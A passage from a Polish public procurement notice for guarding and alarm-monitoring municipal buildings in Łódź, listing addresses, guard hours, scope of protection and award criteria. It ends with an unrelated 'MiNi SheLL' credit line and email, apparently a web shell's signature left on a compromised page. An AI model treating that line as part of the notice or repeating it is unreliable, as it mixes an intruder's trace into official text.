a)   Objazdowa 17  budynek hotelowo - mieszkalny 2-kondygnacyjny, budynki parterowe garażowo - gospodarcze , nieruchomość ogrodzona -pełnienie dozoru  obiektów odbywa się  całodobowo    b)   Konstantynowska 115  jedenaście budynków, teren ogrodzony -Zajezdnia tramwajowa Brus - pełnienie dozoru  obiektów odbywa się  całodobowo  c)   Lipowa 73    dwa budynki o funkcji biurowej oraz trzy budynki gospodarczo - garażowe)   łnienie dozoru  obiektów odbywa się  całodobowo, d)  Więckowskiego 76  budynek frontowy oraz budynek gospodarczy  zamontowana brama wjazdowa  - pełnienie dozoru  obiektów odbywa się  całodobowo  
                                       

e)  Więckowskiego 80   budynek frontowy  zamontowana brama wjazdowa     
                                     - pełnienie dozoru  obiektu odbywa się  całodobowo (przez okres 5 m-cy 
                                               od  stycznia do 31.05.2016r);

f) Zielona 57      budynek lewej oficyny   - pełnienie dozoru  obiektu odbywa się  całodobowo (przez 
                                                                      okres 5 m-cy od  stycznia do 31.05.2016r);

g) Legionów 50     budynek frontowy i prawa oficyna, zamontowana brama, wspólne podwórko z 
                           nieruchomością przy ul. Legionów 48 - pełnienie dozoru  obiektów odbywa się  
                           całodobowo (przez okres 5 m-cy  od  lutego do 30.06.2016r).

3. Zakres wykonywania  usługi w  zakresie CZĘŚCI 1 obejmuje zabezpieczenie obiektu i mienia 
     polegającej na : 
               - ochronie przed dostępem osób nieupoważnionych, 
               -  ochronie przed kradzieżą,  
               - ochronie przed włamaniem 
               - ochronie przed zniszczeniem mienia, 
               - bieżącej kontroli wszystkich pomieszczeń obiektu.
4. Zakres ochrony obejmuje zabezpieczenie obiektu i mienia w nim się znajdującego przed 
     działaniem osób trzecich oraz w sytuacjach innego zagrożenia, w szczególności pożarem, zalaniem 
    wodą itp.
5. Szczegółowe informacje dotyczące  przedmiotu zamówienia CZĘŚCI 1  oraz jego realizacji zawarte są  w  istotnych postanowienia umowy, stanowiącym załącznik nr 8 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Doświadczenie - 4</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Monitorowanie obiektów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 2 zamówienia  -  obejmuje  monitorowanie  obiektów - budynków  nieruchomości położonych w Łodzi przy ul. 
1. Radwańskiej 31  -  RON III-  budynek jednostki organizacyjnej zamawiającego   pełnienie dozoru odbywa się : 
   -  w dni robocze  
                 poniedziałek - od godz. 15 00   do godz. 900 we wtorek   
                     wtorek      -    od godz.1700     do godz. 700 w środę
      -  pozostałe dni robocze   - od godz. 1500  do godz. 700
   pełnienie usługi   w dni  ustawowo wolne od pracy, niedziele  lub inne dni wolne   
   wyznaczone    przez Zamawiającego    2.  6 go Sierpnia 26  - budynek  nieużytkowany pełnienie monitorowania odbywa się   w każdy dzień  tygodnia  całodobowo .
3. Zakres wykonywania usługi w zakresie  CZĘŚCI 2 obejmuje zabezpieczenie obiektu i mienia w nim się znajdującego przed działaniem osób trzecich oraz w sytuacjach innego zagrożenia polegającej na:
1)  podłączeniu systemu alarmowego w chronionym obiekcie  do systemu stacji     
         monitorowania; 
 2 )    utrzymanie w pełnej sprawności systemu alarmowego;
        3) stałego dozoru sygnałów przyjmowanych,  gromadzonych   i przetwarzanych danych  
            w elektronicznych urządzeniach i systemach alarmowych; elektronicznych 
            urządzeniach i systemach alarmowych;
        4)  podjęcie działań przez grupę  interwencyjną;
5) zabezpieczenie obiektów dozorem fizycznym w przypadku zaistnienia awarii systemu. 
4. Szczegółowe informacje dotyczące  opisu zamówienia CZĘŚCI  2  oraz jego realizacji  zawarte są   w    istotnych postanowienia umowy, stanowiącym załącznik nr 9 do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.10.00-1, 50.32.41.00-3, 50.00.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 96</li>
<li>2. Doświadczenie - 4</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com